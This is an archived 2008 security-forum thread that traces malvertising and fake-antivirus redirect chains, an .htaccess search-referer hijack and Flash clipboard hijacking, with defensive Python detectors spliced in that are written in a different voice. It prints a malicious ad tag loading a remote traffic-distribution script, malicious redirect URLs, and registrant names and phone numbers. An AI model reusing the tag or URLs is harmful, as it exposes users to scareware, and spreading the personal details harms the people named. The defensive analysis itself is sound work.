Content-type: text/html
Date: Thu, 09 Oct 2008 17:48:17 GMT
Server: lighttpd/1.4.19

<html><script language="javascript" src="http://adtds.adnewgeneration.com/in.cgi?6&campaign=2235499®ion=[removed]&country=[removed]&city=[removed]"></script><body rightmargin=0 leftmargin=0 topmargin=0 bottommargin=0>.<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000".....   codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0".....   width="300" height="250">.....<param name="movie" value="http://adnewgeneration.com/2235499/300x250.swf?clickTag=http://discoverireland.com&clickTARGET=_blank"> .....<param name="quality" value="high">.....<param name="menu" value="false">.....<param name="clickTag" value="http://discoverireland.com">.....<param name="clickTARGET" value="_blank">.....
<!--[if !IE]> <-->.....<object data="http://adnewgeneration.com/2235499/300x250.swf?clickTag=http://discoverireland.com&clickTARGET=_blank"......width="300" height="250" type="application/x-shockwave-flash">.....<param name="quality" value="high">.....<param name="menu" value="false">.....<param name="pluginurl" value="http://www.macromedia.com/go/getflashplayer">.....<param name="clickTag" value="http://discoverireland.com">.....<param name="clickTARGET" value="_blank">.....</object>.....<!--> <![endif]-->.</object>.</body></html>
______________________________

adnewgeneration.com/2235499/300x250.swf

The Flash advertisement itself is clean; the screenshots are just for "visual reference" because it's NOT the Flash advert triggering the redirect but the script located on the same server, e.g. adtds.adnewgeneration.com.
IPB Image IPB Image
IPB Image IPB Image
______________________________

adtds.adnewgeneration.com/in.cgi?

in.cgi?6 is "dormant" at the time of the writeup (it wasn't when I checked the logs) but the network capture reveals an interesting piece of information on who's behind the domain as seen below.
CODE
HTTP/1.0 200 OK
Set-Cookie: SL_6_0000=_1_; domain=adtds2.promoplexer.com; path=/; expires=Fri, 10-Oct-2008 21:50:59 GMT
Content-Type: text/javascript
Content-Length: 0
Connection: close
Date: Thu, 09 Oct 2008 21:50:59 GMT
Server: lighttpd/1.5.0
Regular readers will recognize adtds2.promoplexer.com.
Just for fun ...
IPB Image
Now, the only place where I see a 300x250 advertisement at careerbuilder.com is on the bottom left and from the look of it they are served by RealMedia ...
IPB Image
Anyone having contacts and / or content from adnewgeneration.com should treat those with extreme caution.

<h4>
IP details.
</h4>
adnewgeneration.com - 70.38.11.165

Website Title: 404 - Not Found
ICANN Registrar: ENOM, INC.
Created: 2008-09-16
Expires: 2009-09-16
Updated: 2008-09-16
Name Server: NS1.DOUBLECLICKADVERTISING.COM (has 1 domains)
Name Server: NS2.DOUBLECLICKADVERTISING.COM
Whois Server: whois.enom.com
Server Type: lighttpd/1.4.19
IP Location - California - Santa Ana - Iweb Dedicated Cl
Dedicated Hosting: adnewgeneration.com is hosted on a dedicated server.
Registration Service Provided By: NameCheap.com

Registrant Contact:
Ind
Ivan Durov
Kiev
Kiev, Kiev 01021
UA

Administrative Contact:
Ind
Ivan Durov ()
+380.937284982
Fax: +1.5555555555
Kiev
Kiev, Kiev 01021
UA

adtds.adnewgeneration.com - 67.205.93.98

ns1.adnewgeneration.com - 70.38.11.165
ns2.adnewgeneration.com - 70.38.11.165
______________________________

tds.gorotation.com / gorotation.com - 67.205.93.102

Website Title: 404 - Not Found
ICANN Registrar: ENOM, INC.
Created: 2008-10-03
Expires: 2009-10-03
Updated: 2008-10-03
Name Server: NS1.GOROTATION.COM (has 1 domains)
Name Server: NS2.GOROTATION.COM
Whois Server: whois.enom.com
IP Location - Ukraine - Private Customer - Iweb
Registration Service Provided By: NameCheap.com
Registrant Contact: WhoisGuard Protected
______________________________

scanner.antivirus-2009-pro.net - 67.205.75.11

Domain name: antivirus-2009-pro.net

Registrant Contact:
Ind
Ivan Durov
Kiev
Kiev, Kiev 01021
UA

Name Servers:
ns1.antivirus-2009-pro.net
ns2.antivirus-2009-pro.net

Creation date: 01 Oct 2008 23:04:21
Expiration date: 01 Oct 2009 23:04:21

Thx guys for the report & capture.
Kimberly
<h4>
adnewgeneration.com & friends
</h4>
Yesterday we discovered a couple of new domains related to the well known adtds2.promoplexer.com / adtds.trackads.net combo.
  • adnewgeneration.com - 70.38.11.165
  • adtds.adnewgeneration.com - 67.205.93.98
  • tds.gorotation.com / gorotation.com - 67.205.93.102
Let's expand the list a lil' bit ...

Redirects.
tds.gorotation.com/?paramss=[removed]
adtds.gorotation.com/in.cgi?[removed]&depid=[removed]&
antivirus-scanner-online.com/scan.php?campaign=[removed]&landid=[removed]&bs=[removed]
adtds.gorotation.com - 67.205.93.102

Name Server: NS1.GOROTATION.COM
Name Server: NS2.GOROTATION.COM
Updated Date: 03-oct-2008
Creation Date: 03-oct-2008
Expiration Date: 03-oct-2009
______________________________

antivirus-scanner-online.com - 67.205.75.14

Website Title: 404 - Not Found
ICANN Registrar: ENOM, INC.
Created: 2008-10-03
Expires: 2009-10-03
Updated: 2008-10-03
Name Server: NS1.ANTIVIRUS-SCANNER-ONLINE.COM (has 1 domains)
Name Server: NS2.ANTIVIRUS-SCANNER-ONLINE.COM
IP Location - Ukraine - Individual
Dedicated Hosting: antivirus-scanner-online.com is hosted on a dedicated server.
Registration Service Provided By: NameCheap.com
Registrant Contact: WhoisGuard Protected

antivirus-scanner-online.com has some interesting neighbours, several are already well known. We also see that the NS servers of gorotation.com have the same IP as the NS server of unicastads.com ... another "old friend."

67.205.75.9
  • antispywaredeluxe.com
  • ns.antispywaredeluxe.com
  • ns.spywaredestructor.com
  • spywaredestructor.com
  • www.pidosoftware.com
67.205.75.10
  • imunizator.com
  • www.imunizator.com
67.205.75.11
  • adszedo.com
  • id325708.adszedo.com
  • ns.adszedo.com
  • scanner.antivirus-2009-pro.com
67.205.75.12
  • internetsecuritydeluxe.com
  • ns.internetsecuritydeluxe.com
  • ns1.internetsecuritydeluxe.com
  • ns2.internetsecuritydeluxe.com
67.205.75.13
  • ns.unicastads.com
  • ns1.gorotation.com
  • ns2.gorotation.com
67.205.75.14
  • antivirus-scanner-online.com
  • ns1.antivirus-scanner-online.com
  • ns2.antivirus-scanner-online.com
Redirects.
adtds.adnewgeneration.com/in.cgi?[removed]
powertds.ws/soft.php?aid=[removed]&d=[removed]&product=XPA&refer=[removed]
antvirushelp.com/2009/1/freescan.php?id=[removed]
powertds.ws makes me think of securetds.ws, involved in the incident at surfline.com. You can read more about that on Sandi's blog.

powertds.ws - 216.240.134.208

Whois Server: whois.website.ws
IP Location - California - Irvine - Go2online Corp
Registrar Name: Rustelekom
Registrar Telephone: 1 866 6254678
Registrar Whois: www.nameservers.ru
Domain Created: 2008-09-15
Domain Last Updated: 2008-09-26
Domain Currently Expires: 2009-09-15
Current Nameservers: ns1.freefastdns.com - ns2.freefastdns.com
______________________________

antvirushelp.com - 89.149.241.106 & 216.240.134.208

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-09-10
Expires: 2009-09-10
Updated: 2008-10-06
Name Server: NS1.FREEFASTDNS.COM (has 39 domains)
Name Server: NS2.FREEFASTDNS.COM
IP Location - Berlin - Berlin - Netdirekt E.k
Registration Service Provided By: REGNAME.BIZ
Contact: +7.9033729049
Website: www.regname.biz

Registrant:
N/A
Moira Jones ()
325 West Gaines Street, Room 634
Tallahassee
Florida,32399
US
Tel. +850.2450449

hostnames sharing ip with a-records.
  1. altawebgl-500.com
  2. googlescanners-360.com
  3. masterspitetds09.com
  4. protectedtds.name
  5. scanner-center.com
  6. seamastersoft.com
  7. trustedpaymenssite.com
domains sharing nameservers.
  1. computerantiviruspro.com - No IP
  2. freefastdns.com - No IP
  3. livetds.ws - 89.18.189.35
  4. ltraffic.cc - 78.108.178.232
  5. mysecuritysupport.com - 208.72.169.100
  6. securedownloadcenter.com - 208.72.168.158
  7. winupdates-server.com - 89.18.189.44
Redirects.
windows-scannercenter.com/?id=82961038475
securetds.ws/soft.php?aid=011804&d=1&product=XPA&refer=563fa6255
Redirect doesn't go further because securetds.ws is dead. windows-scannercenter.com is still active so nothing prevents them from updating the link.

windows-scannercenter.com - 83.229.251.28

Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Whois Server: whois.PublicDomainRegistry.com
Referral URL: www.PublicDomainRegistry.com
Name Server: NS1.WINDOWS-SCANNERCENTER.COM
Name Server: NS2.WINDOWS-SCANNERCENTER.COM
Updated Date: 24-sep-2008
Creation Date: 21-sep-2008
Kimberly
<h4>
WARNING: Possible clipboard hijacking
</h4>
I was doing some research on some of the domains we discovered yesterday when suddenly I did fall on these 2 forum posts ...

Photobucket.com
IPB Image

windows-scannercenter.com/?id=82961038475
quicktds.name/soft.php?aid=[removed]&d=1&product=XPA&refer=[removed]
antiviruslivecheck.com/2009/1/freescan.php?id=[removed]
forums.guru3d.com
IPB Image

windows-scannercenter.com/?id=274400151
quicktds.name/soft.php?aid=[removed]&d=1&product=XPA&refer=[removed]
antiviruslivecheck.com/2009/1/freescan.php?id=[removed]
Why the hell would a Photobucket Community Support person & a member with 1380 posts deliberately insert a malicious URL into their replies? This is very weird ... is this again a sign of clipboard hijacking, or is this something way more serious? When I say serious, I'm thinking about a hack / exploit in forum software. I preview my posts before hitting the reply button and even without that, you would see the URL you insert, don't ya think?
______________________________

quicktds.name - 216.240.134.211

Domain Name ID: 4026204DOMAIN-NAME
Domain Name: QUICKTDS.NAME
Sponsoring Registrar ID: 21REGISTRAR-NAME
Sponsoring Registrar: Directi Internet Solutions Pvt. Ltd. d/b/a PublicDomainRegistry.com
Name Server: NS1.STARTED.RU
Name Server: NS2.STARTED.RU
Created On: 2008-09-16 12:57:31
Expires On: 2009-09-16 12:57:31
Updated On: 2008-09-16 12:57:32
______________________________

antiviruslivecheck.com - 64.86.17.44 & 216.240.134.211

ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-09-10
Expires: 2009-09-10
Updated: 2008-10-10
Name Server: NS1.ROBONAME.COM (has 148 domains)
Name Server: NS2.ROBONAME.COM
Name Server: NS3.ROBONAME.COM
Name Server: NS4.ROBONAME.COM
Registration Service Provided By: RUSTELEKOM LLC
Contact: +1.8666254678
Website: rustelekom.biz
Registrant: PrivacyProtect.org

hostnames sharing ip with a-records
  1. adaptivetds.name
  2. antivirusfulldefence.com
  3. digipayments-soft.com
  4. ns3.bigskycomputerservices.com
  5. ns3.computinghost.com
  6. ns3.emb.com.mx
  7. ns3.mokumdesign.com
  8. ns3.nigerianhost.com
  9. ns3.simkiss4rum.com
  10. ns3.wimago.com
  11. ns3.xisto.com
  12. ns3.yah00-city.com
  13. ns8.dnshree.com
  14. onlinescannersite9.com
  15. tdsvassarium.com
  16. vassariumpromo.com
Kimberly
<h4>
Warning: Photobucket
</h4>
As mentioned yesterday, I did find it odd that a Photobucket Community Support person had a malicious link in one of his replies. Photobucket is probably (again) the victim of a malicious advertisement.

http://forums.photobucket.com/showthread.php?t=30006
Your 'Auto-Copy' feature is being exploited.
--------------------------------------------------------------------------------
One of the ads around Photobucket is overwriting copied image code with a link to an "antivirus" site. I know this site personally from working at Geek Squad. It's a website that will install a nasty piece of adware named Antivirus 2008.

This has happened to me twice today for the first time on two different computers at two different times (+3 hours) both happened when copying an image link/code from PhotoBucket.

If a site admin/webmaster would like to get with me via PM, I can give you the site address, as I don't want to post it on a public forum.

Thanks.
Until this issue has been tracked down, extreme caution is advised when visiting Photobucket and forums.guru3d.com. Seeing the id of the campaigns, there is a big chance they involve 2 distinct advertisements. Don't hesitate to PM us if you have any information regarding this "clipboard" issue.

If needed, instructions on how to clear your clipboard can be found here. Just make sure that all browser windows are closed beforehand.
Kimberly
<h4>
Another case of a hacked .htaccess file: Favell Museum
</h4>
Be very careful if you visit the Favell Museum website - www.favellmuseum.org - from a search engine. The .htaccess file has been hacked and is redirecting people to a fake online scanner. If you directly paste the website into your browser, you won't be affected.
IPB Image
CODE
GET / HTTP/1.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=Favell+Museum&btnG=Google+Search&aq=f&oq=
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: www.favellmuseum.org
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Sun, 12 Oct 2008 04:23:42 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Server: Apache
Location: http://87.248.180.90/in.html?s=ipw2

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://87.248.180.90/in.html?s=ipw2">here</A>.<P>
</BODY></HTML>
Complete redirect.
87.248.180.90/in.html?s=ipw2
quicktds.name/soft.php?aid=[snip]&d=6&product=XPA&refer=[snip]
pcvirusbuster.com/2009/1/freescan.php?id=[snip]
______________________________

pcvirusbuster.com - 64.86.17.44 & 216.240.134.211

ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-10-07
Updated: 2008-10-07
Name Server: SKY.EARTH.ORDERBOX-DNS.COM (has 37,547 domains)
Name Server: SKY.MARS.ORDERBOX-DNS.COM
Name Server: SKY.MERCURY.ORDERBOX-DNS.COM
Name Server: SKY.VENUS.ORDERBOX-DNS.COM
IP Location - Ontario - Brampton - Velcom
Registration Service Provided By: NICS.NAME
Contact: +7.8469724045
Website: nics.name
Registrant: PrivacyProtect.org

<h4>
professionalpcscan.com
</h4>
Redirects.
protectedtds.name/soft.php?aid=[*]&d=6&product=XPA&refer=[*]
professionalpcscan.com/2009/1/freescan.php?id=[*]
professionalpcscan.com - 89.149.241.106 & 216.240.134.208

Creation Date: 10-Sep-2008
Updated Date: 12-oct-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Registration Service Provided By: RUSTELEKOM LLC
Contact: +1.8666254678
Website: rustelekom.biz
Registrant: PrivacyProtect.org
Domain servers in listed order: ns2.false.com - ns1.false.com
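Both the www.oinko.net post and the Favell Museum post above describe the same .htaccess hijack: the site answers a direct visit normally and only 302s visitors whose Referer names a search engine. The Python below is an added example, not code from the posts, written from the webmaster's side. It does two things: it audits an .htaccess file for a RewriteRule to an external URL that is guarded by RewriteCond checks on %{HTTP_REFERER}, and it compares two captured responses (one fetched with a search-engine Referer, one without) the way the network traces in the posts were compared. The .htaccess content, the two responses and the 192.0.2.10 target are constructed samples in the shape of what the posts show; the function names are my own.

```python
import re

# Constructed .htaccess in the shape such hijacks take: the RewriteConds make the
# rule fire only for search-engine referers, so a direct visit looks clean.
# The target below is a documentation address, not the one from the posts.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*live\\.com.* [NC]
RewriteRule .* http://192.0.2.10/in.html?s=example [R,L]
"""

# Constructed responses mirroring the traces in the posts: a 302 when the
# request carried a Google Referer, a 200 when it did not.
REFERER_RESPONSE = """\
HTTP/1.1 302 Found
Date: Sun, 12 Oct 2008 04:23:42 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Server: Apache
Location: http://192.0.2.10/in.html?s=example

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>302 Found</TITLE></HEAD></HTML>
"""
DIRECT_RESPONSE = """\
HTTP/1.1 200 OK
Date: Sun, 12 Oct 2008 04:23:50 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache

<html><body>Museum home page</body></html>
"""

SEARCH_ENGINES = ("google", "yahoo", "msn", "live", "bing", "ask", "aol")
COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+\S+\s+(https?://\S+)", re.I)
REDIRECTS = (301, 302, 303, 307)


def audit_htaccess(text):
    """Return external redirect targets whose RewriteRule is guarded by a referer test."""
    findings = []
    pending = []  # RewriteCond patterns seen since the last RewriteRule
    for line in text.splitlines():
        m = COND_RE.match(line)
        if m:
            pending.append(m.group(1))
            continue
        m = RULE_RE.match(line)
        if m:
            # RewriteConds apply only to the next RewriteRule, so consume them here.
            if any(se in pat.lower() for pat in pending for se in SEARCH_ENGINES):
                findings.append({"referers": pending, "target": m.group(1)})
            pending = []
    return findings


def parse_response(raw):
    """Split a raw HTTP response (as pasted from a trace) into (status, headers)."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.strip().splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def conditional_redirect(with_referer, without_referer):
    """Return the Location a search-engine visitor is sent to, or None if both
    responses agree (a plain 302 for everyone is not the pattern being hunted)."""
    status_ref, headers_ref = parse_response(with_referer)
    status_direct, _ = parse_response(without_referer)
    if status_ref in REDIRECTS and status_direct not in REDIRECTS:
        return headers_ref.get("location")
    return None


if __name__ == "__main__":
    for f in audit_htaccess(SAMPLE_HTACCESS):
        print("referer-gated redirect to", f["target"], "when Referer matches", f["referers"])
    print("search-engine visitors are sent to:", conditional_redirect(REFERER_RESPONSE, DIRECT_RESPONSE))
```

The response comparison is the check to run from outside when you cannot read the server's .htaccess: fetch the page twice, once with a Referer of a search result page and once without, and treat a redirect that appears only in the first fetch as the hijack signature the posts describe.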
Kimberly
<h4>
Photobucket & the Clipboard hijacking incident
</h4>
I have been trying to trace the clipboard hijacking incident down on Photobucket this weekend without any success unfortunately. One thing is for sure, the person's browser was indeed displaying a malvertizement, I actually can demonstrate this very easily. Whether it was actually on Photobucket or another site is yet unknown, it all depends on how many pages / tabs were open…
Before we go any further, let me emphasize in bold a couple of words from his post on the Photobucket forums.
QUOTE(Kimberly @ Oct 11 2008, 03:23 PM)

Your 'Auto-Copy' feature is being exploited.
--------------------------------------------------------------------------------
One of the ads around Photobucket is overwriting copied image code with a link to an "antivirus" site. I know this site personally from working at Geek Squad. It's a website that will install a nasty piece of adware named Antivirus 2008.

This has happened to me twice today for the first time on two different computers at two different times (+3 hours) both happened when copying an image link/code from PhotoBucket.

If a site admin/webmaster would like to get with me via PM, I can give you the site address, as I don't want to post it on a public forum.

Thanks.

How does Photobucket copy a link to your clipboard?

The answer is simple, they use some javascript code and most important of all ... a very small Flash file. Illustration ...
IPB Image
The HTML code of that page contains of course different elements and tags, but we are only interested in the portion relevant to our demonstration.
CODE
  <div id="linksContainer">
        <div id="htmlLinksContainer">
            <label for="txtThumbURLTag2"><b>Share URL - </b>
              Email & IM</label>
            <input name="txtThumbURLTag2" id="txtThumbURLTag2"
                   class="textBox" type="text"
                   value="http://media.photobucket.com/image/halloween%20or%20halloween%20icons/hspaar/My%20Icons/Halloween.jpg"
                   readonly="readonly" onclick="trackCodeClickMediaDetail(event);
                                                copyToClipboard(this);">
            
            <label for="txtThumbURLTag2"><b>Direct Link - </b>
              Layout Pages</label>
            <input name="txtThumbURLTag2" id="txtThumbURLTag2"
                   class="textBox" type="text"
                   value="http://i22.photobucket.com/albums/b346/hspaar/My%20Icons/Halloween.jpg"
                   readonly="readonly" onclick="trackCodeClickMediaDetail(event);
                                                copyToClipboard(this);">
            
            .... snip ...
            
        </div>
   </div>
When you click inside the box containing the code you would like to copy, Direct Link - Layout Pages in our sample, 2 functions are called:
  • trackCodeClickMediaDetail
  • copyToClipboard
We are of course only interested in copyToClipboard. Those functions are stored in a js file. Below is the copyToClipboard function with the reference to the Flash file ... var K="/include/swf/_clipboard.swf"
CODE
function copyToClipboard(E)
{
   var K="/include/swf/_clipboard.swf";
   var H="notifyTextCopied";
   var J=Element.up(E);
   var C=document.createElement("div");
   C.setAttribute("id",H);
   C.appendChild(document.createTextNode("Copied"));
   J.appendChild(C);
   E.onblur=function(L)
   {
     Element.hide(C);
     return true
   };
   var G=Element.cumulativeOffset(E);
   var F=Element.positionedOffset(E);
   Element.show(C);
   if(G.left<(C.offsetWidth+2))
   {
     C.style.left=(F.left+(E.offsetWidth+3))+"px"
   }
   else
   {
     C.style.left=(F.left-(C.offsetWidth+2))+"px"
   }
   C.style.top=F.top+"px";
   var B=Effect.Fade(C,
   {
     fps:75,from:1.9,to:0,duration:1,queue:"front",afterFinish:function()
     {
       Element.remove(C)
     }
    
   }
   );
   window.status="Copied text to clipboard";
   var I="flashcopier";
   if(!$(I))
   {
     var A=document.createElement("div");
     A.id=I;
     document.body.appendChild(A)
   }
   $(I).innerHTML="";
   var D='<embed src="'+K+'" FlashVars="clipboard='+escape(E.value)+'" width="0" height="0" type="application/x-shockwave-flash"></embed>';
   $(I).innerHTML=D;
   E.select();
   return true
}
The link is stored in a variable called "clipboard" and _clipboard.swf is loaded into the browser. _clipboard.swf contains an actionscript with System.setClipboard(clipboard).
IPB Image
That's how the links are copied to your clipboard at Photobucket.

Now if the clipboard content was overwritten, it means that another Flash file was using the same function at the same time, which implies that the malicious banner was being displayed on that Photobucket page or eventually on another one ... supposing any other pages / websites were actually open of course. My 2 cts ? ... We all are aware that they can be very difficult to track down but I personally have the feeling that a malicious advertisement is / was circulating at Photobucket. I came across a highly suspicious banner but at the time of the write-up I can't confirm if the Flash file is "bad" or not.
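The mechanism described above (a 0x0 Flash movie written into the page with the text to copy passed in FlashVars, and System.setClipboard inside the .swf) is the same one a malicious banner can use, which is why the post concludes that another Flash file must have been writing the clipboard at the same time. The Python below is an added example, not Photobucket's code or anything from the post, for scanning a saved page for Flash embeds that are sized to be invisible, reporting whether each comes from a third-party host and whether it is handed a clipboard= FlashVar like Photobucket's own copier. The sample HTML is constructed: the first embed is shaped like Photobucket's flashcopier output, the other two (one visible banner, one hidden .swf on ads.example.invalid) are placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# The Flash Player ActiveX classid as it appears in the page's own object tags.
FLASH_CLASSID = "clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"

# Constructed page fragment: Photobucket-style clipboard copier, a normal visible
# banner, and a hidden third-party .swf (placeholder host).
SAMPLE_HTML = """
<div id="flashcopier"><embed src="/include/swf/_clipboard.swf"
  FlashVars="clipboard=http%3A//i22.photobucket.com/albums/example/Halloween.jpg"
  width="0" height="0" type="application/x-shockwave-flash"></embed></div>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="300" height="250">
  <param name="movie" value="http://ads.example.invalid/banner.swf">
</object>
<EMBED src="http://ads.example.invalid/hidden.swf" width=0 height=0>
"""


class FlashTagCollector(HTMLParser):
    """Collect <object>/<embed> tags, folding each <param> into its enclosing <object>."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self._object = None

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            self._object = {"tag": tag, **attrs}
            self.tags.append(self._object)
        elif tag == "embed":
            self.tags.append({"tag": tag, **attrs})
        elif tag == "param" and self._object is not None:
            self._object["param:" + attrs.get("name", "").lower()] = attrs.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object":
            self._object = None


def movie_source(entry):
    return entry.get("src") or entry.get("data") or entry.get("param:movie") or ""


def is_flash(entry):
    src = movie_source(entry).lower()
    return (src.endswith(".swf") or ".swf?" in src
            or entry.get("type", "").lower() == "application/x-shockwave-flash"
            or entry.get("classid", "").lower() == FLASH_CLASSID)


def _dim(value):
    """Parse width/height attributes such as 0, "0", "300px"; None if absent or non-numeric."""
    try:
        return int(str(value).strip().rstrip("px"))
    except ValueError:
        return None


def find_hidden_flash(html, page_host):
    """Return the Flash embeds that are 1x1 or smaller, with origin and FlashVars hints."""
    parser = FlashTagCollector()
    parser.feed(html)
    findings = []
    for entry in parser.tags:
        if not is_flash(entry):
            continue
        width, height = _dim(entry.get("width")), _dim(entry.get("height"))
        if width is None or height is None or width > 1 or height > 1:
            continue  # a visible player is ordinary advertising, not the pattern here
        src = movie_source(entry)
        host = urlparse(src).netloc or page_host  # relative src means same host as the page
        flashvars = entry.get("flashvars") or entry.get("param:flashvars") or ""
        findings.append({
            "src": src,
            "third_party": host != page_host,
            "clipboard_var": "clipboard=" in flashvars.lower(),
        })
    return findings


if __name__ == "__main__":
    for f in find_hidden_flash(SAMPLE_HTML, "media.photobucket.com"):
        print(f)
```

On a real Photobucket page the legitimate copier shows up as same-host with a clipboard= variable; what the post is looking for is the other kind of hit, a hidden .swf served from an ad host, which is the candidate to pull out and inspect for System.setClipboard.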
Invision Power Board © 2001-2012 Invision Power Services, Inc.